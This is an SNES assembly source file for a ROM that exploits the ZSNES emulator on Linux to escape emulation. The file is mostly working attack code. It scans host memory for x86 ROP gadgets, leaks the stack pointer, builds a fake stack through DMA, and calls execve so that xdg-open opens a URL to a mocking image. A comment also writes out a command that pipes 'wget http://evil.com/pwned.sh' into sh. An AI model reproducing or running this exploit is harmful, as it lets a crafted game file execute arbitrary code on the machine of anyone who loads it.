;rm Z2.sfc; asar Z2.asm && gdb -batch -x gdb.txt

;!base = 0x00401000 ; windows
!base = 0x08048000 ; linux

;goals:
;disassemble
; done
;locate all usable partial instructions
; done
;locate a victory condition
; open "https://stekiri.files.wordpress.com/2009/09/linus-sucks-large.gif"
; then exit() or continue unharmed
;locate important tables
; IRAM - 08329314
; WRAM - 08362FE0
; reg fn ptr table - 088B37C0 + 0x2100*4
;locate import table
; system() - (pointer to 0xB75AE100)
;locate a strategy to open the browser
; leak %esp
;  08108FA4: 02 and [esi-0x9], esp; ret
;   guimouse.inc(gui.asm):106-107
;   in DMA, [esi-0x9] is $43x7-A, can easily be read or written from SNES side
;   in opcodes, [esi] is current PC, I think; also easily readable, but needs some jumping around to get it written where I want
;  also need to execute that - need to find 'regptra'
; inflate stack (once should be enough)
; one DMA inflation is ~32 bytes

;ZSNES register use while executing opcodes:
;eax - value to be written, scratch
;ebx - current opcode byte, scratch
;ecx - current address, scratch?
;edx.h - cycle counter?
;edx.l - something important; cpu flags?
; these four can be overwritten I think
;esi - next opcode to execute (pointer to ROM)
;edi - opcode dispatch table
;ebp - pointer to where the SPC is executing?
;esp - stack
; must be preserved

;the following registers are pushed during DMA handling:
; eax esi edi ecx edx
; ebx esp - also harmless to use, ebx is global scratch across zsnes and nobody ever violates esp
; however, ebp is danger
;register use during DMA handling:
; eax - free, initially 'snesmmap' or 'snesmap2'
; ebx - SCRATCH; set to garbage (ebx=0, bl=current bank) between each iteration
; ecx - UNSAFE; current 'snippet pc' (0x002160 and higher)
; edx - safe to use temporarily, but 4 is subtracted every fourth iteration, and if <= 4, the loop ends
; esi - free, initially random pointer
; edi - free, initially '.addrwrite' for the relevant PPU reg mode (two regs write twice, etc)
; ebp - UNSAFE; something SPC-related, must be preserved

;syscall ingredients:
; any int 0x80 'CD 80'
;  there are only four in the entire zsnes:
;  or      ch, 0FFFFFF80H                          ; 0806D873 _ 80. CD, 80
;   vcache.asm: or ch,80h
;   after returning, writes random trash to u64[edi]
;   byte[.rowleft] and byte[.count] must be 1 for it to return as fast as possible, and byte[.nextar] must be 0
;   safe to use if one syscall is not enough, but execve '/bin/sh -c "wget http://evil.com/pwned.sh | sh"' is enough for everything
;  or      ch, 0FFFFFF80H                          ; 0806DED9 _ 80. CD, 80
;   nearly same as above, but writes different things; this one seems more annoying
;  mov     ch, cl                                  ; 0822C0EC _ 88. CD
;  and     cl, 0AH                                 ; 0822C0EE _ 80. E1, 0A
;   video/newgfx.asm: mov ch,cl; and cl,0Ah
;   syscall may set %esi to garbage before going back on track
;   do not use, it writes and depends on regs all over
;  jmp     ?_59958                                 ; 08268C70 _ EB, CD
;  cmp     byte [?_80171], 1                       ; 08268C72 _ 80. 3D, 0847A700(d), 01
;   somewhere in newgfx2.asm or newg162.asm, 'mov byte[tleftn],33; .label: mov cx,[vrama+eax]; xor ecx,[ng16bprval]'
;   writes garbage to dword[%edi] and dword[%eax], and reads byte[%esp+%eax], before getting on track
;   do not use, it writes and depends on regs all over
; all four stable

; pop eax
; pop ebx
; pop ecx
; pop edx
;  these four are common as fuck - but there's also one that pops all four:
;   080BBB44: pop edx; pop ecx; pop ebx; pop eax; ret
;   dsp.asm:2228-2232
;   same sequence also exists in dspproc.asm
;eax = syscall nr, execve = 11
;ebx = filename "/usr/bin/xdg-open"
;ecx = argv { "/usr/bin/xdg-open", "http://piv.pivpiv.dk" }
;edx = envp NULL

;required locations to find:
; 'and [%esi-9],%esp' in guimouse.inc
; regptra
; IRAM
;  find it via regptra[0x3000*4]
; 080BBB44: pop edx; pop ecx; pop ebx; pop eax; ret [dsp.asm:2228-2232]
; the above int 0x80

;ram map (SA-1 direct page):
;$00 - and [esi-0x9], esp
;$04 - syscall
;$08 - pop all registers
;$0C - regptra minus 0x8000 - access via $2160*4 (+2)
;$10 - IRAM minus 0x3000 - access via $3000..$37FF

;required steps:
;- find the above five
;- grab %esp
;- fix pointers in the fake stack
;- inflate the stack
;- DMA $2180 to stack
;- when it returns, I win.


org $008000
Reset:
XCE
REP #$30

LDA #SA1Reset
STA $2203
STZ $2200

;the SNES CPU can't do hacking (or at least not at the same time as SA-1), might as well do what we can use it for
print "CODE I ",dec(SA1Reset)
print "CODE C 1"
print "CODE BW SBC ",dec(DMA-32768)," ",dec(DMA_end-DMA/2) : fillbyte 1/cos(DMA_end-DMA%2)
print "CODE BW ADC ",dec(IRAM-32768)," ",dec(IRAM_end-IRAM/2) : fillbyte 1/cos(IRAM_end-IRAM%2)
print "CODE BW EOR ",dec(EncodeXORFinal-32768)," 1"

LDX.w #DMA_end-DMA-2
-
SBC DMA,x
;LDA DMA,x
STA $4300,x
DEX
DEX
BPL -

LDX.w #IRAM_end-IRAM-2
-
ADC IRAM,x
;LDA IRAM,x
STA $3000,x
DEX
DEX
BPL -

db $49
;db $A9
EncodeXORFinal:
dw IRAM_dmadata-$3000
STA $2181

;TODO: upload a counter for how much of it is done to VRAM
;just slam loads to $3002/6/A/E/12, it's safe
;read the high words so we don't risk anything stupid if one of them by accident ends up at 0x08270000

BRA $FE


SA1Reset:
REP #$30
LDA #$0780
TCD
;0805 - BWRAM pointer
PEA $4040
PLB
PLB


macro scan_reset()
;$85.d + X = start
LDA.w #!base>>16
STA $87
LDX.w #!base
STZ $85
endmacro


macro scan_aligned(off1, val1, off2, val2, off3, val3, off4, val4)
--
LDA.w $0000+<off1>,x
CMP.w #<val1>
BEQ +
-
TXA
CLC
ADC #$0010
TAX
BCC --
INC $87
BRA --

+
LDA.w $0000+<off2>,x
CMP.w #<val2>
BNE -
LDA.w $0000+<off3>,x
CMP.w #<val3>
BNE -
LDA.w $0000+<off4>,x
CMP.w #<val4>
BNE -
endmacro


macro scan_unaligned1(off1, val1)
LDX #$0000
-
INX
LDA.w <off1>,x
CMP.w #<val1>
BNE -
endmacro

macro scan_unaligned(off1, val1, off2, val2)
LDX #$0000
-
INX
LDA.w <off1>,x
CMP.w #<val1>
BNE -
LDA.w <off2>,x
CMP.w #<val2>
BNE -
endmacro


macro scan_85_add_x_const(skip)
TXA
CLC
ADC.w #<skip>
STA $85
BCC +
INC $87
+
endmacro

macro scan_85_add_x_85()
TXA
CLC
ADC $85
STA $85
BCC +
INC $87
+
endmacro

;scan_reset:
;sets $87 to !base.hw
;sets $85 to 0
;sets X to !base.lw

;scan_aligned:
;in: $85.d+x
;out: $85.d+x = location, $85 = #$0000, only tries every 16th location

;scan_unaligned:
;in: $85.d = start
;out: $85.d+x = location

;scan_store_x_add:
;in: $85 = 0
;out: $85.d += x+(param)

;scan_85_add_x_85:
;in: $85 nonzero
;out: $85.d += x


%scan_reset()
;gui/guitools.inc:24 CopyString
;mov dl, [eax]; mov [ebx], dl; inc eax; inc ebx; or dl,dl
%scan_aligned(0, 0x8A50, 2, 0x8810, 4, 0x4013, 6, 0x0843)
;now at 0x08107B50
%scan_85_add_x_const($1300)
;now at 0x08108E50
;distance to target: T minus 0x0154
;target:
;        jz      ?_21354                                 ; 08108FA3 _ 74, 21
;        test    bx, 1H                                  ; 08108FA5 _ 66: F7. C3, 0001
%scan_unaligned(0, 0x6621, 2, 0xC3F7)
%scan_85_add_x_85()

LDA $85
STA $00
LDA $87
STA $02


%scan_reset()
;vcache.asm:122 UpdateVolume
;?_03180:pushad                                          ; 08067AF0 _ 60
;        xor     eax, eax                                ; 08067AF1 _ 31. C0
;        mov     al, byte [?_71976]                      ; 08067AF3 _ A0, 0832260C(d)
;        shl     eax, 7                                  ; 08067AF8 _ C1. E0, 07
;        mov     ebx, 2748779069                         ; 08067AFB _ BB, A3D70A3D
;
;        or      ch, 0FFFFFF80H                          ; 0806D873 _ 80. CD, 80
%scan_aligned(0, 0x3160, 2, 0xA0C0, 12, 0x0A3D, 14, 0xA3D7)
%scan_85_add_x_const($5C00) ; actually $5D83
%scan_unaligned1(0, 0x80CD)
%scan_85_add_x_85()

LDA $85
STA $04
LDA $87
STA $06


%scan_reset()
;dspproc.asm:405 conv2speed
;?_12142:mov     eax, dword [edi]                        ; 080BC780 _ 8B. 07
;        mov     ebx, dword [?_72806]                    ; 080BC782 _ 8B. 1D, 08342B38(d)
;        mul     ebx                                     ; 080BC788 _ F7. E3
;        mov     ebx, 11025                              ; 080BC78A _ BB, 00002B11
;        div     ebx                                     ; 080BC78F _ F7. F3
%scan_aligned(0, 0x078B, 2, 0x1D8B, 8, 0xE3F7, 11, 0x2B11)
%scan_85_add_x_const($2100) ; actually $226C
;        pop     edx                                     ; 080BE9EC _ 5A
;        pop     ecx                                     ; 080BE9ED _ 59
;        pop     ebx                                     ; 080BE9EE _ 5B
;        pop     eax                                     ; 080BE9EF _ 58
;        ret                                             ; 080BE9F0 _ C3
%scan_unaligned(0, 0x595A, 2, 0x585B)
%scan_85_add_x_85()

LDA $85
STA $08
LDA $87
STA $0A


%scan_reset()
;memory.asm:40 regaccessbankr8
;?_13289:test    ecx, 8000H                              ; 080CB5A0 _ F7. C1, 00008000
;        jz      ?_13290                                 ; 080CB5A6 _ 74, 0D
;        mov     ebx, dword [?_75472+ebx*4]              ; 080CB5A8 _ 8B. 1C 9D, 083913F0(d)
;        mov     al, byte [ebx+ecx]                      ; 080CB5AF _ 8A. 04 0B
;        xor     ebx, ebx                                ; 080CB5B2 _ 31. DB
;        ret                                             ; 080CB5B4 _ C3
%scan_aligned(0, 0xC1F7, 6, 0x0D74, 9, 0x9D1C, 16, 0x0B04)
STX $85

;        call    near [?_80508+ecx*4]                    ; 080CB5CC _ FF. 14 8D, 088B37C0(d)
LDA $002F ; use X to save a few cycles here
LDX $0031
STA $0C
STX $0E
STA $85
STX $87

LDA $00
STA $2160*4
LDA $02
STA $2160*4+2 ; set $2160.r to stack hack

LDA $3000*4
LDX $3000*4+2
STA $85
STX $87

LDX $0002
LDY $0004
STX $10
STY $12
STX $85
STY $87

esp:
dd -1 ; let's execute it, it's SBC $FFFFFF,x which presumably points nowhere.
NOP ; 'esp' must be exactly 9 bytes before the end of the following LDA, so I can't use this byte.


LDA $002160


;IRAM minus 0x3000 is currently in $85, might as well use it
;same value is also in Y(high):X(low)

LDA $04
STA.w IRAM_dmadata_int8
LDA $06
STA.w IRAM_dmadata_int8+2
LDA $08
STA.w IRAM_dmadata_popa
LDA $0A
STA.w IRAM_dmadata_popa+2


TXA
CLC
ADC.w #IRAM_URL
STA.w IRAM_argv+4
TYA
ADC #$0000
STA.w IRAM_argv+6

TXA
CLC
ADC.w #IRAM_xdgopen
STA.w IRAM_argv+0
STA.w IRAM_dmadata_xdgo+0
TYA
ADC #$0000
STA.w IRAM_argv+2
STA.w IRAM_dmadata_xdgo+2

TXA
CLC
ADC.w #IRAM_argv
STA.w IRAM_dmadata_argv+0
TYA
ADC #$0000
STA.w IRAM_dmadata_argv+2
;IRAM_argv: dd 0,0,0 ; .xdgopen, .URL, NULL
;IRAM_xdgopen: db "/usr/bin/xdg-open",0
;IRAM_URL: db "http://piv.pivpiv.dk/",0
;IRAM_dmadata_argv: dd -1 ; %ecx - argv (.argv)
;IRAM_dmadata_xdgo: dd -1 ; %ebx - filename (.xdgopen)


LDA.l esp
STA $85
LDA.l esp+2
STA $87



;we have one more thing to do: we need to find envp
;facts:
;- there are three consecutive dwords on the stack, the arguments to main()
;- the first (argc) is low, <256, but nonzero
;- the second (argv) is between esp and esp+512
;- the third (envp) is equal to first*4 + second + 4

LDX #$0000

FindStack:

.wrong:
INX #4

LDA $0004,x
SEC
SBC.l esp
TAY
LDA $0006,x
SBC $000A,x
BNE .wrong

CPY #$0200
BCS .wrong

LDA $0002,x
BNE .wrong
LDA $0000,x
DEC A
CMP #$0100
BCS .wrong
INC #2
ASL #2
ADC $0004,x
STA $20
LDA $0006,x
ADC #$0000
CMP $000A,x
BNE .wrong
LDA $0008,x
CMP $20
BNE .wrong


LDA $0008,x
STA.l IRAM_dmadata_envp
LDA $000A,x
STA.l IRAM_dmadata_envp+2



LDA #$0001
STA $00420B

BRA $FE ; if not zsnes, we got an infinite loop above, but let's do this anyways.


;ram map, SA-1 DP:                                    [ubuntu   - gentoo  ]
;$00 - and [esi-0x9], esp                             [08108FA4 - 080E99E4]
;$04 - syscall                                        [0806D874 - 
;$08 - pop all registers                              [080BE9EC - 
;$0C - regptra minus 0x8000 - access via $2160*4 (+2) [088B37C0 - 
;$10 - IRAM minus 0x3000 - access via $3000..$37FF    [08326314 - 
;.l esp - %esp                                        [FFFFD178 - 



;useful pointers [gentoo]:
;transdma: 0x080B6490 (end: 0x080B66B4, end reverse 0x080B68A1)
;dmadata:  0x08353E27
;%esp:     0xFFFFD17C (strangely constant)



DMA:
;  dir      reg       source      bytes   hdmabnk hdmacpos hlc      unused
;db $80 : db $80 : dl $00420B : dw $0001 : db $00, $00,$00, $00, $00,$00,$00,$00,$00 ; IRAM -> DMA regs (inflation)

;db $80 : db $80 : dl $401000 : dw $0018 : db $00, $00,$00, $00, $00,$00,$00,$00,$00 ; IRAM -> location
                                                ; parts of it commented out because unused
db $80 : db $80 : dl $400000 : dw $0018 : db $00;, $00,$00, $00, $00,$00,$00,$00,$00 ; IRAM -> location
;db $80 : db $80 : dl $400000 : dw $0040 : db $00, $00,$00, $00, $00,$00,$00,$00,$00 ; IRAM -> location

;db $80 : db $80 : dl $123456 : dw $0008 : db $00, $00,$00, $00, $00,$00,$00,$00,$00 ; IRAM -> location
;db $00 : db $3F : dl $002160 : dw $0008 : db $00, $00,$00, $00, $00,$00,$00,$00,$00 ; $2160+ -> $213F
.end



IRAM:
base $3000
.argv: incbin random.bin:00-08 : dd 0 ; .xdgopen, .URL, NULL
.URL: db "https://stekiri.files.wordpress.com/2009/09/linus-sucks-large.gif",0
.xdgopen: db "/usr/bin/xdg-open",0

.dmadata:

;db $02 ; DMA stack inflation

..popa: incbin random.bin:08-0C ; pop all registers
..envp: incbin random.bin:0C-10 ; %edx - envp (stack)
..argv: incbin random.bin:10-14 ; %ecx - argv (.argv)
..xdgo: incbin random.bin:14-18 ; %ebx - filename (.xdgopen)
dd 11 ; %eax - syscall number
..int8: incbin random.bin:18-1C ; int 0x80

base off

.end

print "PC = ",pc


org $00FFC0
db "ZSNES SUCKS          ";name
db $23;lorom, SA-1
db $35;contains SA-1
db $05;1 bank
db $00;no sram
db $00;ntsc
db $00;licencee
db $00;version
dw $0000,$FFFF;checksum + complement
db $00,$00,$00,$00;unknown stuff
dw $5555,$5555,$FFFF;cop, brk, abort(?)
dw $5555,$FFFF,$5555;nmi, unused, irq
db $00,$00,$00,$00;unknown
dw $FFFF,$FFFF,$FFFF;(emulation) cop, unused, abort
dw $FFFF,Reset,$FFFF;(emulation) nmi, reset, irq/brk
